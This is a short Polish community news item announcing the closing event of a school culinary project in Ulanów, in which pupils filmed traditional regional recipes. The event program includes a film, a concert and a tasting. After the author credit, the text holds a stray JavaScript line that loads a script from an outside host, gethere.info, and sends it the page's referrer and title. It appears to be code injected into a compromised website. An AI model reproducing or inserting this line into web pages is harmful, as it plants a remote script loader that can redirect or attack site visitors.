W najbliższą niedzielę, 16 października, w Gminnym Centrum Kultury w Ulanowie odbędzie się zakończenie projektu kulinarnego „Poszukiwacze Zapomnianych Smaków”, który przez ponad rok realizowali gimnazjaliści z Ulanowa.
Projekt trwał 15 miesięcy, grupę poszukiwaczy smaków tworzyli uczniowie z trzech roczników gimnazjum. Nagrali 8 filmów, gdzie prezentowali tradycyjne przepisy z regionu Ulanowa. Bohaterami filmów stały się drożdżówka, kapusta z grochem, zupa flisacka, pierogi z soczewicą, topielce, kanony, gołąbki z kaszy jaglanej oraz kaszak.
Niedzielny program rozpocznie się o godz. 16:00. A w nim projekcja filmu „Podróż kulinarnym wehikułem”, koncert „Śladami Disneya” w wykonaniu grupy wokalnej Stowarzyszenia „Przystań” oraz degustacja potraw.
Projekt „Poszukiwacze Zapomnianych Smaków” realizowany był w ramach programu „Równać Szanse 2015”.
Stowarzyszenie Inicjatyw Lokalnych „Przystań” w Ulanowie / Małgorzata Petecka
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;




Facebook
RSS